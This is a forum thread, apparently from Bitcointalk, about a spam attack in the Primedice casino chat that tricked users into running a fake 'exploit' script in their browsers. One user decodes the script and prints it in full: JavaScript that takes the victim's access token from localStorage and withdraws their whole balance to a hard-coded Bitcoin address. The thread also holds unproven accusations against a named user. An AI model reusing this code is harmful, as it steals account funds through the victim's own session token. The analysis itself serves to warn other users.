Primedice.com | Since 2013 | Longest Running Crypto Casino | 113 BTC Jackpot!

[keithers]

What in the hell is going on with the Chatbox right now?!   Look what keeps scrolling down the whole page?

[ttman]

yesterday theres a user ( never notice his/her username in the chat ) did say something of the Exploit thing going on in the next 24hrs if Stunna never get back to him/her . i wonder is it regarding this matter  

[williamj2543]

Spoderman for mod! Thanks for sharing this with us m8!

[Ejaculation]

Spoderman for mod! Thanks for sharing this with us m8!

Yeah, Spoderman should be mod!

[StopGG]

What is the Mute command? ill start to mute this guy

[lightlord]

Seems PD chat, has gone a bit crazy.

[Anony]

What is the Mute command? ill start to mute this guy

1. You have to a mod to mute
2. There are tens or hundreds of accounts with different combos posting

There is no way to stop this guy unless chat is turned off, he's most likely also using proxy lists on each acct so I personally don't think he'll be stopped anytime soon.

Plus it seems he has disabled mute command for mods, can't mute anyone at all at the moment.

[StopGG]

No, i think chat is bugged and the server can't read your messages.

[AmazingMonkey265]

This is messed some is being a total meanie!! Oh well I guess you guys will be busy for awhile. Its pretty messed up you cant mute atm.

[michietn94]

what is the purpose he's doing that ?
For leveling up ? or just want to disturb PD chat ?

Hope nothing will loss after the incident
and can be fix, ASAP

[Brah]

Lol, Like I said in Chat a few days ago, if you're stupid enough to try any script/bot you deserve whatever happens.

[nahtnam]

Dont use code you cant read.

[Stunna]

Set some restrictions on chat, obviously don't run untrusted code in your browser.

[Anony]

Set some restrictions on chat, obviously don't run untrusted code in your browser.

Take a look at my post it's clear who it is. Are you going to investigate the issue or end it at leaving restrictions?
I lost coins on my alt but not going to ask for any compensation since It was my own fault hit I want to see justice done to the culprit

both scripts were wrote in java, other than that there is no clear similarities in the two. How are you so certain it was mdma anyway?
And yes, losing your balance was your fault for trying to abuse an exploit. Even if you wanted to recover your losses, doubt Stunna would pay back someone who was trying to scam him in the first place.

[Anony]

Set some restrictions on chat, obviously don't run untrusted code in your browser.

Take a look at my post it's clear who it is. Are you going to investigate the issue or end it at leaving restrictions?
I lost coins on my alt but not going to ask for any compensation since It was my own fault hit I want to see justice done to the culprit

both scripts were wrote in java, other than that there is no clear similarities in the two. How are you so certain it was mdma anyway?
And yes, losing your balance was your fault for trying to abuse an exploit. Even if you wanted to recover your losses, doubt Stunna would pay back someone who was trying to scam him in the first place.

 I did not plan on exploiting I planned on reporting it if it worked, in fact, it didn't. I knew it wouldn't as it isn't possible for something like this to be made.
Have a look closely at both bots, also how did this user get access to the API to do what he did, only staff have access as far as I am concerned?

Also someone please decrypt the address in the malicious code and post it, I'll analyse where this money is going to

Come ask him, he's in chat right now explaining how he did everything. Pretty interesting.

[waterpile]

Its his fault for falling such cheap tricks, don't click links that are suspicious or untrusted

[dooglus]

Wtf I just tried it and .4 BTC disappeared out of my accoun?

I tried decoding the 'exploit'.

I got this far:

Code:

calculate_nonce = function(seed) {
  return 'https://api.primedice.com/api/' + seed + '?access_token=' + localStorage['token'];
};

lut = window['$'];

lut['getJSON'](
  calculate_nonce('users/1'), function(seed) {
    var key1 = 'amount'
    var key2 = 'address'
    var load = {};
    load[key1] = seed['user']['balance'];
    load[key2] = '1UKZqhqW9QfNjEaSBTMqZhX4TWoHG51ju';
    lut['post'](calculate_nonce('withdraw'), load);
  }
);

I guess it's using the API to get your balance and withdraw it to address 1UKZqhqW9QfNjEaSBTMqZhX4TWoHG51ju.

Probably best not to run it...

Edit:

Wtf I just tried it and .4 BTC disappeared out of my accoun?

If you check the address your balance gets send to, you'll see the total haul is only 0.03 BTC. It doesn't look like anyone lost 0.4 BTC from their accoun unless you ran a different version of the hack with a different destination address.

[Anony]

Wtf I just tried it and .4 BTC disappeared out of my accoun?

I tried decoding the 'exploit'.

I got this far:

Code:

calculate_nonce = function(seed) {
  return 'https://api.primedice.com/api/' + seed + '?access_token=' + localStorage['token'];
};

lut = window['$'];

lut['getJSON'](
  calculate_nonce('users/1'), function(seed) {
    var key1 = 'amount'
    var key2 = 'address'
    var load = {};
    load[key1] = seed['user']['balance'];
    load[key2] = '1UKZqhqW9QfNjEaSBTMqZhX4TWoHG51ju';
    lut['post'](calculate_nonce('withdraw'), load);
  }
);

I guess it's using the API to get your balance and withdraw it to address 1UKZqhqW9QfNjEaSBTMqZhX4TWoHG51ju.

Probably best not to run it...

Edit:

Wtf I just tried it and .4 BTC disappeared out of my accoun?

If you check the address your balance gets send to, you'll see the total haul is only 0.03 BTC. It doesn't look like anyone lost 0.4 BTC from their accoun unless you ran a different version of the hack with a different destination address.

there were actually 2 different scripts being posted, one withdrawing to the address you mentioned above, and the other to 19Nft7skg4RdH7P43XYcCSYRzZwQiTy6PE which collected ~0.3btc

[WhatTheGox]

don't click links that are suspicious or untrusted

+1
dont ever click strange links, sometimes its tricky though i fell for one once at BTC-e which was cleverly disguised to mimic a bitcointalk.org link. 

[DiamondCardz]

What is the Mute command? ill start to mute this guy

1. You have to a mod to mute
2. There are tens or hundreds of accounts with different combos posting

There is no way to stop this guy unless chat is turned off, he's most likely also using proxy lists on each acct so I personally don't think he'll be stopped anytime soon.

Plus it seems he has disabled mute command for mods, can't mute anyone at all at the moment.

Put this in my original post...This is DEFINITELY MDMA

Prove it.

Until you prove it you have no basis to make accusations like this. "He is good at coding" is not proof. I'm good at coding, does that mean I am now the person who stole everyone's BTC? I don't know if anything happened to mdma that I'm not aware of (i.e. he was demoted from Mod or something like that), but until I know the situation, I have to call you out there.